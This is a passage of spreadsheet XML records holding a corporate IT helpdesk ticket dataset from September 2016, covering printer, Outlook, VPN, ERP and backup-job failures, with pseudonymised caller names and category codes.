    <s v="mkdptnhv rawxhtgz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer installation"/>
    <s v="name:fbhyeksq caexmols_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:fbhyeksq.caexmols@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:unable to print. have updated drivers, however still saying needs updated"/>
    <s v="fbhyeksq caexmols"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook does not start"/>
    <s v="outlook does not start"/>
    <s v="ojmagzdu qepicvlz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="unlocked. and confirmed with user."/>
    <s v="cwmiksxf iamtgrvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="locked out of password_management_tool"/>
    <s v="_x000a__x000a_received from: vfjsubao.yihelxgp@gmail.com_x000a__x000a_can you please reset my password?_x000a_[cid:image001.png@01d20db0.745c31d0]_x000a__x000a__x000a__x000a_vfjsubao yihelxgp_x000a_customer service representative_x000a__x000a__x000a_"/>
    <s v="vfjsubao yihelxgp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to tx02 and tx03"/>
    <s v="unable to connect to tx02 and tx03"/>
    <s v="hldkncve ptrikgvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook does not start."/>
    <s v="outlook does not start."/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket udpate on inplant_856928"/>
    <s v="_x000d__x000a__x000d__x000a_from: fumkcsji sarmtlhyanardhanan _x000d__x000a_sent: tuesday, september 13, 2016 8:36 pm_x000d__x000a_to: bvwepigr ekmarvgd_x000d__x000a_cc: vyluaepi dtwfaejr_x000d__x000a_subject: inc1547039_x000d__x000a__x000d__x000a_hi jashyht_x000d__x000a__x000d__x000a_user had called to mention that he needs to be able to get on wireless as he will be travelling._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="add rqiw8514281 to rqigfgage qlhmawgi sgwipoxn"/>
    <s v="name:seghyurghei_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can you add rqiw8514281 to rqigfgage qlhmawgi sgwipoxn"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="time cards missing from service -now &amp; change of supervisors name"/>
    <s v="from: sagfhosh karhtyiio _x000a_sent: tuesday, september 13, 2016 11:04 am_x000a_to: rabhtui edula_x000a_cc: ufpzergq zchjbfdehivashankaraiah; rkupnshb gsmzfojw_x000a_subject: inc1540911:time cards missing from ticketing_tool &amp; change of supervisors name_x000a__x000a_hi rabhtui,_x000a__x000a_it looks like timecards for last two weeks in august 2016 &amp; 1st week of september 2016 are missing from service -now. i also checked with my team member venkat he is also having same issue._x000a__x000a_and also request you to change the supervisor name from erihyuk m baurhty to xabkyoug wdkyiqfx._x000a__x000a_inc1540911 is assigned to you please take a look. please  revert for any clarifications._x000a__x000a__x000a_ _x000a__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="35"/>
  </r>
  <r>
    <s v="pdf files are not getting saved (freezes) from server ."/>
    <s v="pdf files are not getting saved (freezes) from server ."/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call disconnected due to vpn disconnection"/>
    <s v="call disconnected due to vpn disconnection"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call disconnected due to vpn disconnection"/>
    <s v="call disconnected due to vpn disconnection"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print from cl_75"/>
    <s v="unable to print from cl_75"/>
    <s v="etvendormhd xpslzunb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german call // caller disconnected"/>
    <s v="german call // caller disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="microsoft word stopped working - unable to open files"/>
    <s v="microsoft word stopped working - unable to open files"/>
    <s v="epgjmacy hktjzngw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wanted to contact hr"/>
    <s v="user wanted to contact hr"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expired"/>
    <s v="password expired"/>
    <s v="diwlhstv hfktxpib"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_585 failed in job_scheduler at: 09/13/2016 10:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_585 failed in job_scheduler at: 09/13/2016 10:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="frequently getting error in outlook application."/>
    <s v="frequently getting error in outlook application. error message is attached."/>
    <s v="xgcnzwsh rwyctfzk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="call got disconnected as vpn went off for a while"/>
    <s v="call got disconnected as vpn went off for a while"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="auto output for inwarehouse_tools"/>
    <s v="auto output for inwarehouse_tools.  siemens cm 81873983 is set up to auto output inwarehouse_tools to service@company.com however these are not being received in email to trigger on-line invoicing on customer website."/>
    <s v="DEsowkrH sciejzNE"/>
    <x v="12"/>
  </r>
  <r>
    <s v="printer problem / issue information - recurring problem"/>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all printers_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?  says has to install a driver.  won't print._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      all documents_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      all systems_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  no and yes_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   all systems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rxqtvanc kthqwxvb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="zcor0003; variants plant_271 and rodstock not working in erp"/>
    <s v="zcor0003; variants plant_271 and rodstock not working in erp_x000a_"/>
    <s v="rpinaqvc hyomubns"/>
    <x v="43"/>
  </r>
  <r>
    <s v="unable to create a new expense"/>
    <s v="unable to create a new expense as its showing an infotype error."/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sandir02 (usa,pa):the interface fc9/45 (10.1.102.202)is down since at 9:09 am et on 09/13."/>
    <s v="sandir02 (usa,pa):the interface fc9/45 (10.1.102.202)is down since at 9:09 am et on 09/13."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="inwarehouse_tools were not included to payment proposal"/>
    <s v="inwarehouse_tools were not included to payment proposal"/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account unlocked"/>
    <s v="account unlocked"/>
    <s v="nhckjuyq esoadhlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_859389"/>
    <s v="ticket update on inplant_859389"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="ctbjdrnf lideywqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from private number // got disconnected"/>
    <s v="call from private number // got disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am not able to connect to my regular printer or any printer.  ts02 on HostName_769"/>
    <s v="x5380 "/>
    <s v="koiapqbg teyldpkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company-na-usa-usa-switch-tc02-1-2960-access-sw01.company.com:interface: fastethernet0/3 Â· furnace pc ray jankowski is do"/>
    <s v="company-na-usa-usa-switch-tc02-1-2960-access-sw01.company.com_x000d__x000a_: interface: fastethernet0/3 Â· furnace pc ray jankowski is down."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="maschinen pc von r241 im bereich kentip lÃ¤sst sich nicht mehr starten;"/>
    <s v="maschinen pc von r241 im bereich kentip lÃ¤sst sich nicht mehr starten;"/>
    <s v="ljxzyriq zqxkrcev"/>
    <x v="32"/>
  </r>
  <r>
    <s v="erp probleme"/>
    <s v="wenn ich am rechner evh8114148 im erp eine zeichnung Ã¶ffnen will schlieÃŸt erp. dann muss ich mich neu einloggen._x000d__x000a_es wurden bereits zwei tickets geschrieben. aber das problem wurde bisher nicht behoben."/>
    <s v="jnktafrs ytxiowbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="impossible to remove &quot;country of origin&quot; data on inwarehouse_tools for export customer 70202027"/>
    <s v="we've made a uacyltoe hxgaycze with xawlkiey demjqrfl in SID_1 - inwarehouse_tool number 0157138137_x000d__x000a_there is also inwarehouse_tool 0159117484 and proforma 0159122287 in SID_34 as examples (please note that english sentences are automatic ones and french are manual ones)._x000d__x000a_on customer master level - classification i checked &quot;no&quot; on print export info, but it doesn't work._x000d__x000a__x000d__x000a_"/>
    <s v="hadbkvwt touedfyr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="urgent!!!!!  personnel number not accepted by travel expense manager in erp"/>
    <s v="personnel number not accepted by travel expense manager in erp"/>
    <s v="bgaxwntz biofkvrs"/>
    <x v="51"/>
  </r>
  <r>
    <s v="HostName_1043:average (4 samples) disk free on c:\ is now 6%"/>
    <s v="HostName_1043:average (4 samples) disk free on c:\ is now 6%"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="zurÃ¼cksetzen auf 12.09.2016"/>
    <s v="_x000a__x000a_received from: cflrqoew.qbgjwaye@gmail.com_x000a__x000a_hallo_x000a__x000a_kÃ¶nnen sie mir helfen, die unten gekennzeichnete datenbank plant_113 stock report_daily.xlsx auf den 12.09.16 zurÃ¼ckzusetzen_x000a_danke_x000a__x000a_[cid:image001.png@01d20db4.06570281]_x000a__x000a_cflrqoew qbgjwaye_x000a_process planning_x000a_cflrqoew.qbgjwaye@gmail.com&lt;mailto:cflrqoew.qbgjwaye@gmail.com&gt;_x000a__x000a_company company produktions gmbh &amp; co. kg, geschÃ¤ftsfÃ¼hrer: dr. jofghyuach fabry, phvkowml azbtkqwx, naruedlk mpvhakdq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cflrqoew qbgjwaye"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit portal \ujtmipzv cwdzunxs"/>
    <s v="probleme mit portal \ujtmipzv cwdzunxs"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="zeiterfassung funktioniert nicht \we_qs \qualitÃ¤tsmanagement \xwirzvda okhyipgr"/>
    <s v="zeiterfassung funktioniert nicht \we_qs \qualitÃ¤tsmanagement \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="scanner metroligic fÃ¼r rechner we_wu160 defekt \zedlet"/>
    <s v="canner metroligic fÃ¼r rechner we_wu160 defekt \zedlet"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install company barcode fÃ¼r ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="install company barcode fÃ¼r ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/13/2016 04:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/13/2016 04:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="repeat print in tips printer"/>
    <s v="repeat print in tips printer"/>
    <s v="aikejxpb xdavwocg"/>
    <x v="31"/>
  </r>
  <r>
    <s v="HostName_1193 - f:\ label:dat1-HostName_1193 36e52bcd  is over  85% space consumed. space available: 1.4 g"/>
    <s v="HostName_1193 - f:\ label:dat1-HostName_1193 36e52bcd  is over  85% space consumed. space available: 1.4 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn we_wu160 unlock"/>
    <s v="qlhmawgi sgwipoxn we_wu160 unlock"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="purchasing freetext requisitions cannot be created"/>
    <s v="we are having serious issues with creating shopping cars in purchasing._x000d__x000a_a buyer group of apac is defaulting and not changeable._x000d__x000a_since this buyer group belongs to a different purch. org. it causes an error that cannot be overwritten._x000d__x000a_it seems, this only happens when creating freetext shopping carts._x000d__x000a_we need immediate action on this. _x000d__x000a_no one can create freetext requisitions at all._x000d__x000a_"/>
    <s v="ckmnouwi nxmtkubc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="vip2- outlook not working, asking for password "/>
    <s v="vip2- outlook not working, asking for password. no password prompt is coming up."/>
    <s v="zanivrec capbfhur"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we need a dn for 5018069717  material 2837572 pcs 25  plant plant_197  thanks"/>
    <s v="we need a dn for 5018069717  material 2837572 pcs 25  plant plant_197  "/>
    <s v="wckrxovs aunsgzmd"/>
    <x v="5"/>
  </r>
  <r>
    <s v="can not access in SID_1"/>
    <s v="can not access in SID_1"/>
    <s v="qnvkwalx dfjtxigl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fehler bei bestellung in -purchasing- katalog"/>
    <s v="_x000a__x000a_received from: pltkqrfd.bfohnjmz@gmail.com_x000a__x000a_guten morgen,_x000a__x000a_wie eben mit hotline besprochen, sende ich die fehlermeldung die beim einkaufen in purchasing katalog erscheint._x000a__x000a_[cid:hardcopy-cid]_x000a__x000a_contact :"/>
    <s v="pltkqrfd bfohnjmz"/>
    <x v="29"/>
  </r>
  <r>
    <s v="need cute pdf installed."/>
    <s v="need cute pdf installed."/>
    <s v="vgptfdqw yjqeridp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vpn not working"/>
    <s v="from: yuxloigj tzfwjxhe _x000d__x000a_sent: tuesday, september 13, 2016 10:50 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: re: action required: please connect to the new vpn url before january 30_x000d__x000a__x000d__x000a_hello:_x000d__x000a__x000d__x000a_my vpn is not working.  kindly help.  "/>
    <s v="cyzonilx jyhutqpd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user tfazwrdv upwonzvdâ€™s pc name has been changed to atcl8316840 (old pc name : atclx205739)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sthyuraj.sektyhar@company.com_x000d__x000a__x000d__x000a_user tfazwrdv upwonzvd's pc name has been changed to atcl8316840 (old pc name : atclx205739)_x000d__x000a_user wants this to be updated in telephony_software system for i3 updates_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_from: may yi &lt;zupifghd.vdqxepun@gmail.com&lt;mailto:zupifghd.vdqxepun@gmail.com&gt;&gt;_x000d__x000a_date: 13 september 2016 at 09:29:08 gmt+5:30_x000d__x000a_to: rajyutyi kuttiadi &lt;xezjvnyr.hmjwknxs@gmail.com&lt;mailto:xezjvnyr.hmjwknxs@gmail.com&gt;&gt;_x000d__x000a_cc: obuwfnkm ufpwmybi &lt;obuwfnkm.ufpwmybi@gmail.com&lt;mailto:obuwfnkm.ufpwmybi@gmail.com&gt;&gt;, tfazwrdv upwonzvd &lt;tfazwrdv.upwonzvd@gmail.com&lt;mailto:tfazwrdv.upwonzvd@gmail.com&gt;&gt;_x000d__x000a_subject: fw: computer name change in telephony_software_x000d__x000a_hello rajyutyi,_x000d__x000a_could you help to put below stations to company net?_x000d__x000a__x000d__x000a_user name_x000d__x000a__x000d__x000a_new pc name/_x000d__x000a__x000d__x000a_mac address_x000d__x000a__x000d__x000a_tfazwrdv upwonzvd_x000d__x000a__x000d__x000a_atcl8316840_x000d__x000a__x000d__x000a_00:04:f2:90:54:b2_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="tfazwrdv upwonzvd"/>
    <x v="6"/>
  </r>
  <r>
    <s v="ethics"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gasbfqvp.fmvqgjih@gmail.com_x000d__x000a__x000d__x000a_guten morgen,_x000d__x000a__x000d__x000a_leider kann ich den kurs nicht absolvieren, da ich keinen zugang bekomme. bis hierher geht's._x000d__x000a__x000d__x000a_[cid:image001.png@01d20d93.7193c930]_x000d__x000a__x000d__x000a_mit den besten wÃ¼nschen und grÃ¼ÃŸen_x000d__x000a__x000d__x000a_gasbfqvp fmvqgjih_x000d__x000a_designer, product engineering â€“ wear solutions_x000d__x000a_company shared services gmbh_x000d__x000a__x000d__x000a_tel.: +49 (0) 9279 - 80 - 121_x000d__x000a_fax   +49 (0) 9279 - 80 â€“ 220_x000d__x000a_mobil +49 (0) 151 - 57634082_x000d__x000a__x000d__x000a_e- mail adresse: gasbfqvp.fmvqgjih@gmail.com&lt;mailto:gasbfqvp.fmvqgjih@gmail.com&gt;_x000d__x000a__x000d__x000a_www.company.com&lt;_x000d__x000a__x000d__x000a_eckersdorfer straÃŸe 10_x000d__x000a_95490 germany/ bayern/ germany_x000d__x000a__x000d__x000a_geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq_x000d__x000a__x000d__x000a_sitz/registered office: fÃ¼rth/bay. â€“ registergerirtcht/listed in the court register: fÃ¼rth/bay. hra 7481_x000d__x000a_persÃ¶nlich haftende gesellschafterin/general partner: company deutschland gmbh_x000d__x000a_sitz/registered office: germany. â€“ registergerirtcht/listed in the court register: bad homburg v.d.h. hrb 7492_x000d__x000a__x000d__x000a_"/>
    <s v="gasbfqvp fmvqgjih"/>
    <x v="23"/>
  </r>
  <r>
    <s v="i can't do purchase requisition at purchasing - see attachment"/>
    <s v="i can't do purchase requisition at purchasing - see attachment_x000d__x000a_account 81377661 requires a assignment to a co object ! i can't select a byer"/>
    <s v="maiklcjz ltwrfysm"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/13/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/13/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="computer can't started "/>
    <s v="computer can't started "/>
    <s v="zyblacuk mvjqwgzn"/>
    <x v="31"/>
  </r>
  <r>
    <s v="need to install nvyjtmca xjhpznds applications"/>
    <s v="need to install nvyjtmca xjhpznds applications_x000d__x000a_1) job_scheduler_x000d__x000a_2) backup_tool_x000d__x000a_3) vmware_x000d__x000a_4) vnc viewer_x000d__x000a__x000d__x000a_while trying to install these applications it is asking for administration access."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="18"/>
  </r>
  <r>
    <s v="no new fax-in on ricoh fax folder at company malaysia - public (\\amssm003) (q:)"/>
    <s v="we cannot see new fax-in to  &quot;public (\\amssm003) (q:) &gt; ricoh fax folder&quot; since end of august 2016. could you please check and fix if there have been any problems?_x000d__x000a_"/>
    <s v="srpkmdcg skdubtnr"/>
    <x v="11"/>
  </r>
  <r>
    <s v="outloot  è€æ˜¯æç¤ºè¾“å…¥å¯†ç ï¼Œæ›´æ”¹å¯†ç åŽæ— æ•ˆï¼Œè¯·è½¬å°è´ºã€‚"/>
    <s v="outloot  è€æ˜¯æç¤ºè¾“å…¥å¯†ç ï¼Œæ›´æ”¹å¯†ç åŽæ— æ•ˆï¼Œè¯·è½¬å°è´ºã€‚"/>
    <s v="cnxbswhv qmtngeyh"/>
    <x v="30"/>
  </r>
  <r>
    <s v="job bkwin_search_server_qa_daily failed in job_scheduler at: 09/12/2016 23:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_search_server_qa_daily failed in job_scheduler at: 09/12/2016 23:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="extract file for the request 2626619 "/>
    <s v="extract the file for the request 2626619 using rscrm bapi"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="8"/>
  </r>
  <r>
    <s v="please help qskwgjym bsqdaxhf delete paramdntyeters and payment run in t-code f110"/>
    <s v="please help qskwgjym bsqdaxhf delete paramdntyeters and payment run in t-code f110"/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job SID_37stat failed in job_scheduler at: 09/12/2016 22:54:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37stat failed in job_scheduler at: 09/12/2016 22:54:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="gr error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gkwcxzum.answkqpe@gmail.com_x000d__x000a__x000d__x000a_dear all_x000d__x000a__x000d__x000a_would you please help us out ? we can't complete gr for below._x000d__x000a__x000d__x000a_mm 5119707 qty 108_x000d__x000a_po 5019190021_x000d__x000a__x000d__x000a_[ì„¤ëª…: cid:image001.png@01d20dac.8cd597f0]_x000d__x000a__x000d__x000a_"/>
    <s v="gkwcxzum answkqpe"/>
    <x v="29"/>
  </r>
  <r>
    <s v="switch down -  company-ap-ind-kirty-coating-2960s-access-sw01 located at india kirty is down since 08:18 pm et on 09/12."/>
    <s v="switch down -  company-ap-ind-kirty-coating-2960s-access-sw01 located at india kirty is down since 08:18 pm et on 09/12."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkwin_tax_interface_dev_daily failed in job_scheduler at: 09/12/2016 22:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........          8          _x000d__x000a_  failed disk agents ...........          0          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........          8          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          0          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................   92176 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          0  _x000d__x000a__x000d__x000a_job bkwin_tax_interface_dev_daily failed in job_scheduler at: 09/12/2016 22:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="could you resolve item category error during zfd ordering?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbvpcytz.nokypgvx@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_we are facing item category issue for zfd(free of charge) order so#35900902â€¦now we cannot select item category zklnâ€¦_x000d__x000a_could you please check and resolve the issue?_x000d__x000a__x000d__x000a_order detail:_x000d__x000a_sales org : 1306_x000d__x000a_so#35900902_x000d__x000a_order type : zfd_x000d__x000a_mm#4855028_x000d__x000a_qty : 10pcs_x000d__x000a_delivery plant : plant_317_x000d__x000a_usage : product lost intrans_x000d__x000a__x000d__x000a_we cannot select item category &quot;zkln&quot; without error. hence, erp cannot identify this open order. we cannot see this open order at md04 screen._x000d__x000a_[cid:image003.jpg@01d20db0.cf5931a0]_x000d__x000a__x000d__x000a_[cid:image004.jpg@01d20db0.cf5931a0]_x000d__x000a__x000d__x000a_[cid:image005.png@01d20db0.6fa42800]_x000d__x000a__x000d__x000a_"/>
    <s v="fbvpcytz nokypgvx"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/12/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bma@HostName_1302.hq.company.com &quot;lib6_drive3&quot;  time: 9/12/2016 10:01:05 pm_x000d__x000a_[90:51]   /dev/rmt39.1_x000d__x000a_ cannot write to device ([5] i/o error)_x000d__x000a__x000d__x000a_[critical] from: vbda@HostName_184.hq.company.com &quot;/nfsbackup - hana SID_62 - differential backup&quot;  time: 9/12/2016 10:01:41 pm_x000d__x000a_ received abort request from sm =&gt; aborting._x000d__x000a__x000d__x000a_session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........          1          _x000d__x000a_  failed disk agents ...........          1          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........          2          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          0          _x000d__x000a_  failed media agents ..........          1          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  553296 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          2 _x000d__x000a__x000d__x000a__x000d__x000a_job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/12/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_46filesys failed in job_scheduler at: 09/12/2016 22:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[major] from: bma@HostName_1302.hq.company.com &quot;lib6_drive2&quot;  time: 9/12/2016 10:01:08 pm_x000d__x000a_[90:51]   /dev/rmt51.1_x000d__x000a_ cannot write to device ([5] i/o error)_x000d__x000a__x000d__x000a_[critical] from: vbda@HostName_229.hq.company.com &quot;HostName_229-bk.hq.company.com [/usr/erp]&quot;  time: 9/12/2016 10:01:44 pm_x000d__x000a_ received abort request from sm =&gt; aborting._x000d__x000a__x000d__x000a_session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         22          _x000d__x000a_  failed disk agents ...........          2          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         24          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          0          _x000d__x000a_  failed media agents ..........          1          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................   44876 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          4  _x000d__x000a__x000d__x000a_job SID_46filesys failed in job_scheduler at: 09/12/2016 22:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_38filesys failed in job_scheduler at: 09/12/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a__x000d__x000a_session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         24          _x000d__x000a_  failed disk agents ...........          2          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         26          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          0          _x000d__x000a_  failed media agents ..........          1          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................   73883 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          4  _x000d__x000a__x000d__x000a_job SID_38filesys failed in job_scheduler at: 09/12/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="lnssm005: shop_floor_app application is down on 9/12/2016 at 1:07 pm"/>
    <s v="the shop_floor_app is reporting a : unreachable status on, lnssm005. please investigate"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="1"/>
  </r>
  <r>
    <s v="is SID_34 down?  i keep receiving a balancing error."/>
    <s v="is SID_34 down?  i keep receiving a balancing error."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="nzaghmdr sgdlajvw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: udetjzmn.ayueswcm@gmail.com_x000d__x000a__x000d__x000a_good evening_x000d__x000a__x000d__x000a_i have lost my vpn login icon. can this be reinstated?_x000d__x000a__x000d__x000a_"/>
    <s v="udetjzmn ayueswcm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype and outlook not launching."/>
    <s v="skype and outlook not launching._x000a_-connected to the user system using teamviewer._x000a_had the user connectt to the company vpn._x000a_-deleted rsa files and help the user login to the skype._x000a_-tried to reconfigure the mscrm ,no go._x000a_-tried to repair the ms office._x000a_reinstalled the ms office._x000a_-caller confirmed that he is now able to see the emails on outlook._x000a_-issue resolved._x000a_-computer : lmsl9516645_x000a_contact:"/>
    <s v="zxlhkpfi zylaghei"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1193  - status f:\  is now 86% utilized."/>
    <s v="HostName_1193  - status f:\ label:dat1-HostName_1193 36e52bcd  is now 86% utilized."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="11"/>
  </r>
